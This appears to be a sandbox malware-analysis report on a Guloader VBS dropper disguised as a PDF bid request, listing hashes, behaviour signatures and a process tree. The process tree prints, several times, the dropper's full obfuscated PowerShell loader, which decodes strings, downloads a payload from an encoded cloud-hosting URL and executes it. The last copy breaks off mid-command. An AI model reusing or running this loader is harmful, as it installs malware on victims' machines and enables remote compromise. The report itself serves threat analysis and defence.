Overview

overview

10

Static

static

1

SOLICITUD ...df.vbs

windows7-x64

10

SOLICITUD ...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/09/2024, 15:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SOLICITUD DE OFERTA_23-09-2024·pdf.vbs

  • Size

    28KB

  • MD5

    5a65706576c1c8a4021c28a4e1f4016d

  • SHA1

    1a736c96a27370ad4848e4c67b2fbda142d76a9d

  • SHA256

    8d3fcc51b8c2c9a5dbef3cb0575df9e31319492fc94ccb681cfc4ebc0dba7905

  • SHA512

    5e74c3a5d3a8cef461bdee06f57b3b869ca681733f32fcf17b09d4b214f4b3b2d76ec622038153bbc466d4cfb75ee63c2d7110574868272cbfc9f79c0b8bdfb8

  • SSDEEP

    768:PIM0cce8YsQcf6B3iYLAT1imcypq5EQUTswhWbN/v5GXr/VkvpcvSZ:PtKT1Ymp2V

Score
10/10
guloaderdiscoverydownloader

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 3 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE OFERTA_23-09-2024·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4332
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Udkradsenes Konfigurering Besgsrekord Ascarides Reabandons slikkeriet #>;$Decumbent='Aff';<#Herdsmen Ambulatoria Sstninger Eksportmarkederne #>;$Arkitektoniskes=$host.PrivateData;If ($Arkitektoniskes) {$Lunsernes++;}function Vidvinkelkameraet($Beskedent){$Reversibiliteters=$Beskedent.Length-$Lunsernes;for( $Work48=5;$Work48 -lt $Reversibiliteters;$Work48+=6){$Lavandula+=$Beskedent[$Work48];}$Lavandula;}function Lestobiotic($Repaganise){ &($Volume) ($Repaganise);}$Valgmuligheder=Vidvinkelkameraet 'Tv stMAmoeboFlod,zMatchiC surlAp,lel L nga Newz/Suver5Mi go.Knick0Matth Brest(SpeosWPh.rmi stron Kugldmark oSpallwcopros Grnt BullbNselvaTFovei Tanke1Blayn0Cteno.Afbag0Stran; Nong MarxW LytbiUlvesnPresu6ov rr4Opry.; Uptr ,acitxodori6Cam u4Un er;Rash. FrigrrTvangvdeka :D,tai1Limbe2Flosc1Humic.Teles0slowm)Orfeb RigatGSt,noe LeuccHeli,kpigmeoPrea./ etra2Cana 0 Octo1Floe,0Tvend0Optag1censo0Rigs,1Forti ru.inFTabriiOutcar DhobeMeso fAposto KuldxPos t/Dartm1Toeta2Preov1Proti.Auri 0 drha ';$Pegepinds=Vidvinkelkameraet 'Genanu Br ns S ineForunRD,plo-AfmysAIn pogKv preBrevvn Un etAdstr ';$Overthrows=Vidvinkelkameraet 'Sp rrhStyrttPyroptTavlep NonfsIndiv:Ditle/Forsl/ aucd D,tarKompaifestiv olyteEf er.Atticg,ommuoTrifuoRy,nigHerealVinkae C tm.Afd pc ColloMalacmInde./ lkaluJinshcsnapy?AbriceModvixDialypLitteoRlingr ConftAarsm=MelondugrlioGudehwH benn Bouql DarioSapphaGenredZyg,n&LigeviDynawd skod=H cti1DeacoEbutteq Dampc SkolYPr crZ AmanxepirrxGlauxEPsittuTriviILawnlpBr dg8 Bag Qd tad2 BemgYL ndiHbevidp D,llN odbrbMultilLorrah ManhSdataeMM.ybemNe vrRCrumbK aamLPah.re krmVOxoniZ En.hwMetthV Samm ';$Blameredes=Vidvinkelkameraet 'Forso>Genin ';$Volume=Vidvinkelkameraet 'M,lebi ReseEEvgrexHooey ';$Redningstjenestes='Kwela';$Antiphlogistic = Vidvinkelkameraet ' deleAnparcbeskyhCapito rown Cubit%FotoaaPrescp ellopNo sedUnderaOssictbrnehacrest%Bened\Ne,taFkommirMind aArgenuVombakVe freRokke.BirthSStorhiSe egk Dagv .ndi&Okser&s ipp p,ofie InflcTilbah lastoSamle PiezotBrode ';Lestobiotic (Vidvinkelkameraet 'Clema$ GuldgAb omlErg,toS earbbuklea .plylSols :P.ncaPMa sel Korsi DiskgUoverhSmudstNaestebronkd Don =S.mmn(Kal uc,ntermAgenddForbi Scien/Ud racBornh Enter$UndtaAOrnitn EntetmetroiVomitp Va,dhStiftlKarm oMyndeg Mer ioctansUndertUnu.niWhiskcAnsig)Bu hb ');Lestobiotic (Vidvinkelkameraet 'Ubevo$JurisgAlmonl kseoArt,rb BulkaBoobilluna :steptmApproaHanebsIngenhCangui landnStenfe .ontsCrimps spol= Kart$VrighOTov.evHel.iebowelr TaartEjendhEntrerMorgeo DiviwbardisLgemi. HydrsVul ap ommulGasfliVer ntR.gbr( culi$Bro dBSidevlPrograUngr.m ManveAf,onrGod ee BrocdOarwee snessMo.og)Mus e ');Lestobiotic (Vidvinkelkameraet 'bandm[ReforNBedriecurratPacif.Pa dlSListee LangrPressvForaniWea.icDele,eMorgePGulixoFe eri,hakenUnsigtKrepeM KernaAnkrenBogskase tegAffroeC,ulirCount]Human: Unde:Kett.SC,rkue Aceic Hejsu.ntamrSu.eri Tn.it stemy To ePKurdar ReacoPhototOver o NonccCahi ocronylFlip Trak=Eleva O erd[SavleN EpiseUdm ttBoble.SammeSFrinueDdnincLayeruStninr slaai SinotamatryLokalPLufter.ldflobattetgr teoCollec.olleoPredel AffiTFla uy Ana,pOdonte mund]Se.en:C,clo:F uorTImplilDatabsSalin1Tacca2L cop ');$Overthrows=$mashiness[0];$Kvrnens= (Vidvinkelkameraet 'Elfen$ LovvG rnneL T,muoSoldaBHugesaOutquLCafen: LeniPG ottRCura e Bj,ksfremmU ddisP Brodpbioc,o uncoS Sp,kiPial,tsma.hISerbioPr prnInvesLVatniE Co.oSOms osSt re= Eft,nProceETuberwYodel-D,amooKobbeBBajo JGrifleFosf cWerewt Zing D saS perayParaps PelaTBelsteErh,emBaryl.Weigenpyrr EsyssaTInter.CalycW Fr sEXylogBStrafCInterL RegeIAfgifEHje tN FascT');$Kvrnens+=$Plighted[1];Lestobiotic ($Kvrnens);Lestobiotic (Vidvinkelkameraet 'Rustn$RuggePHyperr Septe clavsNonreuGarblp EustpHefteoelemesRegu iMagestTricoiFolenoMerognDesanlOversemon tsModersHydra.skramHOrdreeAktivaE isadDrfyle Termr V.alsPiber[Varek$AmphiPAngioe PersgSimulefodp pHovediHelbrnNarkodUdsugsDri l] Omsa=Udsti$zooloVFavouaBurhnlerhveg Smgtmagerbu PashlOctahiSizalgLavinhAim ee NajedKnifieAirshr xtra ');$Moud=Vidvinkelkameraet 'Zioni$LuftiPTilryrFan oe Leops,eraruHistopAnt fpReassoung nsNucleiPatritRygh.iSekteoGlac,nUdrrilT leueFor,osSchoosPyron.tempeDStenooBenziwSt tenSk vrlHave o Skibaov rtd U,orFAfmeliS gmulNonfaeRecon(Lokkt$ForlgOKonstvFakuleExterrTrafitIntubhSnedkrDefroostamvwH,lessp ast,Tugle$.egleVindskiUdre.oNephillempeeTil.etEla.ttIntereFolkesU rad)Trick ';$Violettes=$Plighted[0];Lestobiotic (Vidvinkelkameraet 'Abneg$SlukkgHe,leLCompooO.strbopse,ABemrkLMisog: specF.romiLE tocAGlabeDDeba bPutteaSrboeR T.ksm inese OpdiDsymboE ,ens=Kylli(,afoytI.poneCorevsUdbant ellh- TektP Son aA chetResemHVoldg Benga$Till vEmpatILandgo utbrL Ta,deDrif.TH ndetS.ngee ilrsUnlas)Yamal ');while (!$Fladbarmede) {Lestobiotic (Vidvinkelkameraet ',rugt$VltesgophuglFi dloWobl b gunsaGrafilSalat:FordmPV rmer,acemoScrawc GniseLa.gss.agoosHjrneomeloirKra peLi terDomicn banieFys.ksFinan=E ect$ScrewtTaf irH lsnuRe.veeReven ') ;Lestobiotic $Moud;Lestobiotic (Vidvinkelkameraet 's,perSU,navtEnvelaChirorTarrat.este- ogniSParislCoacceM rcheKontopBogb. Overm4Fejlu ');Lestobiotic (Vidvinkelkameraet 'Acaly$EjendgQuomilHarpioBogfrbSp gea UndelScruf:DaterFLommel frataB,nomd BasebBlndiachinarMus.kmRewineThokid TonjeSk re=Tapes(F,dteT SavveNyhedsFl mptkapni-StoreP Rusta ndertU finhStats Anst$Po tmV.lokkiKlubboDakotlLsladeR dent RevetInfrie R tzsChair)Ripsa ') ;Lestobiotic (Vidvinkelkameraet 'Sovse$ Re.pgVat alSelvhoPrecob d.traIns rlCryoh:kreatJ ConcuOp,tad Tan,oYoghokHaemaa Shik=Arc e$AdamagN netlHal,moPolygbBinzuaEvisll.eage:Kool,dRseneaBif gmDocernF,nyaaAk.umtSakkaoPlumrrInspayUss l+Sekve+ yps%Fatal$.angomS udka Kla s BenzhMy opiBlattn romeeRe ursAmb lsDispa.QuickcAlb.mo nomouLi,jenFart,tBrn p ') ;$Overthrows=$mashiness[$Judoka];}$Tegningers=300517;$Medial=30436;Lestobiotic (Vidvinkelkameraet 'Fo en$IdentgHovedlFalteoHrkrmbTandraBrabbl Oxys:FistiD Kra eDisq n enomuChicknL.ggicSericiMa neaFredetCouraiB ttevGradue Lovf2Maim.1Sol,e8 Supe Unde=Fo,ko NoncoGFort.e RapstArthr-Ba.dpCzacatoAarrinIntertEmisseScribnB.sant,veru Besou$Pro,uVSt.ntiStdt o Tal lSkorzeWhoret.ncoltAntineKr.vos etud ');Lestobiotic (Vidvinkelkameraet ' Fa.t$ P etgBreddlDomfloSla sbDustiaPa kelRialt:FrinuHSjlehe Tv vlAus ul TjeneAn inbstum aFremhrkransdFy tjiWeekesIgnistFrdseeArd ar toze Conce=,oass ,ncon[F ftyS Stokyautoss TaxitRatioeMatrim,olum.AarsdCHarleoSp nsnUnsurvUnreveEun.krUafhntPrefi]Triqu:Bndse:SectiFTipolrKampio Sonam depaBKatteaSteresBundfeKylli6Decer4UdeluSPre at ,kunrTag,eiAnomonPulicgImp t(Pa,jf$ TillDThermeCowb.nDe inuSputanqueercma emiSona aBjlentClutti ,saavBondeePulpa2 End 1Godke8Du er) salo ');Lestobiotic (Vidvinkelkameraet 'Sparr$ UnfogBypaslAguilo B ndb GustaAdvoklpalae:HovedDFlgbrrSinewg Refee formnSelade Lichs Odo, Iodop=Jekat Stokk[ArbejSNo.rayAdjacs Tar tParteeRel smUnexp.HaphtTForske emi,x FordtNep,r. Far.EIndsnnP dgic ServoUnwi.dGangsiHarnin lodagValdh] visu:Til,l:DobbeA ymphS P,ltC FyrsILirekI ,asi.DekanGFragteSigmatPaintS Wed tSkuesrKongsiProcrnPommegRea,p(Forst$ TidsHSkulkeS redlSarcolEducaeDisembSpartatiggerBevindOsciliTrolds,ejrstBaldeeStatsrBnder)Wirep ');Lestobiotic (Vidvinkelkameraet 'Athwa$Out hg SerblBasiloLandfbslikaaComfol yphe:FusenBSlje e fugnk MandeSolvrnStraad UnhatauburhSu.fueMemord Cent9 ind5Dkrl.=El te$IconoD TranrTo grgSalige FopdnnabobeAutovsBorde. Phans.iggeuva albFinensMusvitFe rarIndvai BortnStyreg Un t(Diarr$AftviTobrazeargoagLinjenR adfiFjer nBo tegStatsemisaprDgnbosLeat.,Scath$OsphrMPaakleGoldtdFre diThyroaNigrelContr)Mud e ');Lestobiotic $Bekendthed95;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4200
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Frauke.Sik && echo t"
        3⤵
          PID:4956
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Udkradsenes Konfigurering Besgsrekord Ascarides Reabandons slikkeriet #>;$Decumbent='Aff';<#Herdsmen Ambulatoria Sstninger Eksportmarkederne #>;$Arkitektoniskes=$host.PrivateData;If ($Arkitektoniskes) {$Lunsernes++;}function Vidvinkelkameraet($Beskedent){$Reversibiliteters=$Beskedent.Length-$Lunsernes;for( $Work48=5;$Work48 -lt $Reversibiliteters;$Work48+=6){$Lavandula+=$Beskedent[$Work48];}$Lavandula;}function Lestobiotic($Repaganise){ &($Volume) ($Repaganise);}$Valgmuligheder=Vidvinkelkameraet 'Tv stMAmoeboFlod,zMatchiC surlAp,lel L nga Newz/Suver5Mi go.Knick0Matth Brest(SpeosWPh.rmi stron Kugldmark oSpallwcopros Grnt BullbNselvaTFovei Tanke1Blayn0Cteno.Afbag0Stran; Nong MarxW LytbiUlvesnPresu6ov rr4Opry.; Uptr ,acitxodori6Cam u4Un er;Rash. FrigrrTvangvdeka :D,tai1Limbe2Flosc1Humic.Teles0slowm)Orfeb RigatGSt,noe LeuccHeli,kpigmeoPrea./ etra2Cana 0 Octo1Floe,0Tvend0Optag1censo0Rigs,1Forti ru.inFTabriiOutcar DhobeMeso fAposto KuldxPos t/Dartm1Toeta2Preov1Proti.Auri 0 drha ';$Pegepinds=Vidvinkelkameraet 'Genanu Br ns S ineForunRD,plo-AfmysAIn pogKv preBrevvn Un etAdstr ';$Overthrows=Vidvinkelkameraet 'Sp rrhStyrttPyroptTavlep NonfsIndiv:Ditle/Forsl/ aucd D,tarKompaifestiv olyteEf er.Atticg,ommuoTrifuoRy,nigHerealVinkae C tm.Afd pc ColloMalacmInde./ lkaluJinshcsnapy?AbriceModvixDialypLitteoRlingr ConftAarsm=MelondugrlioGudehwH benn Bouql DarioSapphaGenredZyg,n&LigeviDynawd skod=H cti1DeacoEbutteq Dampc SkolYPr crZ AmanxepirrxGlauxEPsittuTriviILawnlpBr dg8 Bag Qd tad2 BemgYL ndiHbevidp D,llN odbrbMultilLorrah ManhSdataeMM.ybemNe vrRCrumbK aamLPah.re krmVOxoniZ En.hwMetthV Samm ';$Blameredes=Vidvinkelkameraet 'Forso>Genin ';$Volume=Vidvinkelkameraet 'M,lebi ReseEEvgrexHooey ';$Redningstjenestes='Kwela';$Antiphlogistic = Vidvinkelkameraet ' deleAnparcbeskyhCapito rown Cubit%FotoaaPrescp ellopNo sedUnderaOssictbrnehacrest%Bened\Ne,taFkommirMind aArgenuVombakVe freRokke.BirthSStorhiSe egk Dagv .ndi&Okser&s ipp p,ofie InflcTilbah lastoSamle PiezotBrode ';Lestobiotic (Vidvinkelkameraet 'Clema$ GuldgAb omlErg,toS earbbuklea .plylSols :P.ncaPMa sel Korsi DiskgUoverhSmudstNaestebronkd Don =S.mmn(Kal uc,ntermAgenddForbi Scien/Ud racBornh Enter$UndtaAOrnitn EntetmetroiVomitp Va,dhStiftlKarm oMyndeg Mer ioctansUndertUnu.niWhiskcAnsig)Bu hb ');Lestobiotic (Vidvinkelkameraet 'Ubevo$JurisgAlmonl kseoArt,rb BulkaBoobilluna :steptmApproaHanebsIngenhCangui landnStenfe .ontsCrimps spol= Kart$VrighOTov.evHel.iebowelr TaartEjendhEntrerMorgeo DiviwbardisLgemi. HydrsVul ap ommulGasfliVer ntR.gbr( culi$Bro dBSidevlPrograUngr.m ManveAf,onrGod ee BrocdOarwee snessMo.og)Mus e ');Lestobiotic (Vidvinkelkameraet 'bandm[ReforNBedriecurratPacif.Pa dlSListee LangrPressvForaniWea.icDele,eMorgePGulixoFe eri,hakenUnsigtKrepeM KernaAnkrenBogskase tegAffroeC,ulirCount]Human: Unde:Kett.SC,rkue Aceic Hejsu.ntamrSu.eri Tn.it stemy To ePKurdar ReacoPhototOver o NonccCahi ocronylFlip Trak=Eleva O erd[SavleN EpiseUdm ttBoble.SammeSFrinueDdnincLayeruStninr slaai SinotamatryLokalPLufter.ldflobattetgr teoCollec.olleoPredel AffiTFla uy Ana,pOdonte mund]Se.en:C,clo:F uorTImplilDatabsSalin1Tacca2L cop ');$Overthrows=$mashiness[0];$Kvrnens= (Vidvinkelkameraet 'Elfen$ LovvG rnneL T,muoSoldaBHugesaOutquLCafen: LeniPG ottRCura e Bj,ksfremmU ddisP Brodpbioc,o uncoS Sp,kiPial,tsma.hISerbioPr prnInvesLVatniE Co.oSOms osSt re= Eft,nProceETuberwYodel-D,amooKobbeBBajo JGrifleFosf cWerewt Zing D saS perayParaps PelaTBelsteErh,emBaryl.Weigenpyrr EsyssaTInter.CalycW Fr sEXylogBStrafCInterL RegeIAfgifEHje tN FascT');$Kvrnens+=$Plighted[1];Lestobiotic ($Kvrnens);Lestobiotic (Vidvinkelkameraet 'Rustn$RuggePHyperr Septe clavsNonreuGarblp EustpHefteoelemesRegu iMagestTricoiFolenoMerognDesanlOversemon tsModersHydra.skramHOrdreeAktivaE isadDrfyle Termr V.alsPiber[Varek$AmphiPAngioe PersgSimulefodp pHovediHelbrnNarkodUdsugsDri l] Omsa=Udsti$zooloVFavouaBurhnlerhveg Smgtmagerbu PashlOctahiSizalgLavinhAim ee NajedKnifieAirshr xtra ');$Moud=Vidvinkelkameraet 'Zioni$LuftiPTilryrFan oe Leops,eraruHistopAnt fpReassoung nsNucleiPatritRygh.iSekteoGlac,nUdrrilT leueFor,osSchoosPyron.tempeDStenooBenziwSt tenSk vrlHave o Skibaov rtd U,orFAfmeliS gmulNonfaeRecon(Lokkt$ForlgOKonstvFakuleExterrTrafitIntubhSnedkrDefroostamvwH,lessp ast,Tugle$.egleVindskiUdre.oNephillempeeTil.etEla.ttIntereFolkesU rad)Trick ';$Violettes=$Plighted[0];Lestobiotic (Vidvinkelkameraet 'Abneg$SlukkgHe,leLCompooO.strbopse,ABemrkLMisog: specF.romiLE tocAGlabeDDeba bPutteaSrboeR T.ksm inese OpdiDsymboE ,ens=Kylli(,afoytI.poneCorevsUdbant ellh- TektP Son aA chetResemHVoldg Benga$Till vEmpatILandgo utbrL Ta,deDrif.TH ndetS.ngee ilrsUnlas)Yamal ');while (!$Fladbarmede) {Lestobiotic (Vidvinkelkameraet ',rugt$VltesgophuglFi dloWobl b gunsaGrafilSalat:FordmPV rmer,acemoScrawc GniseLa.gss.agoosHjrneomeloirKra peLi terDomicn banieFys.ksFinan=E ect$ScrewtTaf irH lsnuRe.veeReven ') ;Lestobiotic $Moud;Lestobiotic (Vidvinkelkameraet 's,perSU,navtEnvelaChirorTarrat.este- ogniSParislCoacceM rcheKontopBogb. Overm4Fejlu ');Lestobiotic (Vidvinkelkameraet 'Acaly$EjendgQuomilHarpioBogfrbSp gea UndelScruf:DaterFLommel frataB,nomd BasebBlndiachinarMus.kmRewineThokid TonjeSk re=Tapes(F,dteT SavveNyhedsFl mptkapni-StoreP Rusta ndertU finhStats Anst$Po tmV.lokkiKlubboDakotlLsladeR dent RevetInfrie R tzsChair)Ripsa ') ;Lestobiotic (Vidvinkelkameraet 'Sovse$ Re.pgVat alSelvhoPrecob d.traIns rlCryoh:kreatJ ConcuOp,tad Tan,oYoghokHaemaa Shik=Arc e$AdamagN netlHal,moPolygbBinzuaEvisll.eage:Kool,dRseneaBif gmDocernF,nyaaAk.umtSakkaoPlumrrInspayUss l+Sekve+ yps%Fatal$.angomS udka Kla s BenzhMy opiBlattn romeeRe ursAmb lsDispa.QuickcAlb.mo nomouLi,jenFart,tBrn p ') ;$Overthrows=$mashiness[$Judoka];}$Tegningers=300517;$Medial=30436;Lestobiotic (Vidvinkelkameraet 'Fo en$IdentgHovedlFalteoHrkrmbTandraBrabbl Oxys:FistiD Kra eDisq n enomuChicknL.ggicSericiMa neaFredetCouraiB ttevGradue Lovf2Maim.1Sol,e8 Supe Unde=Fo,ko NoncoGFort.e RapstArthr-Ba.dpCzacatoAarrinIntertEmisseScribnB.sant,veru Besou$Pro,uVSt.ntiStdt o Tal lSkorzeWhoret.ncoltAntineKr.vos etud ');Lestobiotic (Vidvinkelkameraet ' Fa.t$ P etgBreddlDomfloSla sbDustiaPa kelRialt:FrinuHSjlehe Tv vlAus ul TjeneAn inbstum aFremhrkransdFy tjiWeekesIgnistFrdseeArd ar toze Conce=,oass ,ncon[F ftyS Stokyautoss TaxitRatioeMatrim,olum.AarsdCHarleoSp nsnUnsurvUnreveEun.krUafhntPrefi]Triqu:Bndse:SectiFTipolrKampio Sonam depaBKatteaSteresBundfeKylli6Decer4UdeluSPre at ,kunrTag,eiAnomonPulicgImp t(Pa,jf$ TillDThermeCowb.nDe inuSputanqueercma emiSona aBjlentClutti ,saavBondeePulpa2 End 1Godke8Du er) salo ');Lestobiotic (Vidvinkelkameraet 'Sparr$ UnfogBypaslAguilo B ndb GustaAdvoklpalae:HovedDFlgbrrSinewg Refee formnSelade Lichs Odo, Iodop=Jekat Stokk[ArbejSNo.rayAdjacs Tar tParteeRel smUnexp.HaphtTForske emi,x FordtNep,r. Far.EIndsnnP dgic ServoUnwi.dGangsiHarnin lodagValdh] visu:Til,l:DobbeA ymphS P,ltC FyrsILirekI ,asi.DekanGFragteSigmatPaintS Wed tSkuesrKongsiProcrnPommegRea,p(Forst$ TidsHSkulkeS redlSarcolEducaeDisembSpartatiggerBevindOsciliTrolds,ejrstBaldeeStatsrBnder)Wirep ');Lestobiotic (Vidvinkelkameraet 'Athwa$Out hg SerblBasiloLandfbslikaaComfol yphe:FusenBSlje e fugnk MandeSolvrnStraad UnhatauburhSu.fueMemord Cent9 ind5Dkrl.=El te$IconoD TranrTo grgSalige FopdnnabobeAutovsBorde. Phans.iggeuva albFinensMusvitFe rarIndvai BortnStyreg Un t(Diarr$AftviTobrazeargoagLinjenR adfiFjer nBo tegStatsemisaprDgnbosLeat.,Scath$OsphrMPaakleGoldtdFre diThyroaNigrelContr)Mud e ');Lestobiotic $Bekendthed95;"
          3⤵
          • Network Service Discovery
          • Suspicious use of WriteProcessMemory
          PID:3596
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Udkradsenes Konfigurering Besgsrekord Ascarides Reabandons slikkeriet #>;$Decumbent='Aff';<#Herdsmen Ambulatoria Sstninger Eksportmarkederne #>;$Arkitektoniskes=$host.PrivateData;If ($Arkitektoniskes) {$Lunsernes++;}function Vidvinkelkameraet($Beskedent){$Reversibiliteters=$Beskedent.Length-$Lunsernes;for( $Work48=5;$Work48 -lt $Reversibiliteters;$Work48+=6){$Lavandula+=$Beskedent[$Work48];}$Lavandula;}function Lestobiotic($Repaganise){ &($Volume) ($Repaganise);}$Valgmuligheder=Vidvinkelkameraet 'Tv stMAmoeboFlod,zMatchiC surlAp,lel L nga Newz/Suver5Mi go.Knick0Matth Brest(SpeosWPh.rmi stron Kugldmark oSpallwcopros Grnt BullbNselvaTFovei Tanke1Blayn0Cteno.Afbag0Stran; Nong MarxW LytbiUlvesnPresu6ov rr4Opry.; Uptr ,acitxodori6Cam u4Un er;Rash. FrigrrTvangvdeka :D,tai1Limbe2Flosc1Humic.Teles0slowm)Orfeb RigatGSt,noe LeuccHeli,kpigmeoPrea./ etra2Cana 0 Octo1Floe,0Tvend0Optag1censo0Rigs,1Forti ru.inFTabriiOutcar DhobeMeso fAposto KuldxPos t/Dartm1Toeta2Preov1Proti.Auri 0 drha ';$Pegepinds=Vidvinkelkameraet 'Genanu Br ns S ineForunRD,plo-AfmysAIn pogKv preBrevvn Un etAdstr ';$Overthrows=Vidvinkelkameraet 'Sp rrhStyrttPyroptTavlep NonfsIndiv:Ditle/Forsl/ aucd D,tarKompaifestiv olyteEf er.Atticg,ommuoTrifuoRy,nigHerealVinkae C tm.Afd pc ColloMalacmInde./ lkaluJinshcsnapy?AbriceModvixDialypLitteoRlingr ConftAarsm=MelondugrlioGudehwH benn Bouql DarioSapphaGenredZyg,n&LigeviDynawd skod=H cti1DeacoEbutteq Dampc SkolYPr crZ AmanxepirrxGlauxEPsittuTriviILawnlpBr dg8 Bag Qd tad2 BemgYL ndiHbevidp D,llN odbrbMultilLorrah ManhSdataeMM.ybemNe vrRCrumbK aamLPah.re krmVOxoniZ En.hwMetthV Samm ';$Blameredes=Vidvinkelkameraet 'Forso>Genin ';$Volume=Vidvinkelkameraet 'M,lebi ReseEEvgrexHooey ';$Redningstjenestes='Kwela';$Antiphlogistic = Vidvinkelkameraet ' deleAnparcbeskyhCapito rown Cubit%FotoaaPrescp ellopNo sedUnderaOssictbrnehacrest%Bened\Ne,taFkommirMind aArgenuVombakVe freRokke.BirthSStorhiSe egk Dagv .ndi&Okser&s ipp p,ofie InflcTilbah lastoSamle PiezotBrode ';Lestobiotic (Vidvinkelkameraet 'Clema$ GuldgAb omlErg,toS earbbuklea .plylSols :P.ncaPMa sel Korsi DiskgUoverhSmudstNaestebronkd Don =S.mmn(Kal uc,ntermAgenddForbi Scien/Ud racBornh Enter$UndtaAOrnitn EntetmetroiVomitp Va,dhStiftlKarm oMyndeg Mer ioctansUndertUnu.niWhiskcAnsig)Bu hb ');Lestobiotic (Vidvinkelkameraet 'Ubevo$JurisgAlmonl kseoArt,rb BulkaBoobilluna :steptmApproaHanebsIngenhCangui landnStenfe .ontsCrimps spol= Kart$VrighOTov.evHel.iebowelr TaartEjendhEntrerMorgeo DiviwbardisLgemi. HydrsVul ap ommulGasfliVer ntR.gbr( culi$Bro dBSidevlPrograUngr.m ManveAf,onrGod ee BrocdOarwee snessMo.og)Mus e ');Lestobiotic (Vidvinkelkameraet 'bandm[ReforNBedriecurratPacif.Pa dlSListee LangrPressvForaniWea.icDele,eMorgePGulixoFe eri,hakenUnsigtKrepeM KernaAnkrenBogskase tegAffroeC,ulirCount]Human: Unde:Kett.SC,rkue Aceic Hejsu.ntamrSu.eri Tn.it stemy To ePKurdar ReacoPhototOver o NonccCahi ocronylFlip Trak=Eleva O erd[SavleN EpiseUdm ttBoble.SammeSFrinueDdnincLayeruStninr slaai SinotamatryLokalPLufter.ldflobattetgr teoCollec.olleoPredel AffiTFla uy Ana,pOdonte mund]Se.en:C,clo:F uorTImplilDatabsSalin1Tacca2L cop ');$Overthrows=$mashiness[0];$Kvrnens= (Vidvinkelkameraet 'Elfen$ LovvG rnneL T,muoSoldaBHugesaOutquLCafen: LeniPG ottRCura e Bj,ksfremmU ddisP Brodpbioc,o uncoS Sp,kiPial,tsma.hISerbioPr prnInvesLVatniE Co.oSOms osSt re= Eft,nProceETuberwYodel-D,amooKobbeBBajo JGrifleFosf cWerewt Zing D saS perayParaps PelaTBelsteErh,emBaryl.Weigenpyrr EsyssaTInter.CalycW Fr sEXylogBStrafCInterL RegeIAfgifEHje tN FascT');$Kvrnens+=$Plighted[1];Lestobiotic ($Kvrnens);Lestobiotic (Vidvinkelkameraet 'Rustn$RuggePHyperr Septe clavsNonreuGarblp EustpHefteoelemesRegu iMagestTricoiFolenoMerognDesanlOversemon tsModersHydra.skramHOrdreeAktivaE isadDrfyle Termr V.alsPiber[Varek$AmphiPAngioe PersgSimulefodp pHovediHelbrnNarkodUdsugsDri l] Omsa=Udsti$zooloVFavouaBurhnlerhveg Smgtmagerbu PashlOctahiSizalgLavinhAim ee NajedKnifieAirshr xtra ');$Moud=Vidvinkelkameraet 'Zioni$LuftiPTilryrFan oe Leops,eraruHistopAnt fpReassoung nsNucleiPatritRygh.iSekteoGlac,nUdrrilT leueFor,osSchoosPyron.tempeDStenooBenziwSt tenSk vrlHave o Skibaov rtd U,orFAfmeliS gmulNonfaeRecon(Lokkt$ForlgOKonstvFakuleExterrTrafitIntubhSnedkrDefroostamvwH,lessp ast,Tugle$.egleVindskiUdre.oNephillempeeTil.etEla.ttIntereFolkesU rad)Trick ';$Violettes=$Plighted[0];Lestobiotic (Vidvinkelkameraet 'Abneg$SlukkgHe,leLCompooO.strbopse,ABemrkLMisog: specF.romiLE tocAGlabeDDeba bPutteaSrboeR T.ksm inese OpdiDsymboE ,ens=Kylli(,afoytI.poneCorevsUdbant ellh- TektP Son aA chetResemHVoldg Benga$Till vEmpatILandgo utbrL Ta,deDrif.TH ndetS.ngee ilrsUnlas)Yamal ');while (!$Fladbarmede) {Lestobiotic (Vidvinkelkameraet ',rugt$VltesgophuglFi dloWobl b gunsaGrafilSalat:FordmPV rmer,acemoScrawc GniseLa.gss.agoosHjrneomeloirKra peLi terDomicn banieFys.ksFinan=E ect$ScrewtTaf irH lsnuRe.veeReven ') ;Lestobiotic $Moud;Lestobiotic (Vidvinkelkameraet 's,perSU,navtEnvelaChirorTarrat.este- ogniSParislCoacceM rcheKontopBogb. Overm4Fejlu ');Lestobiotic (Vidvinkelkameraet 'Acaly$EjendgQuomilHarpioBogfrbSp gea UndelScruf:DaterFLommel frataB,nomd BasebBlndiachinarMus.kmRewineThokid 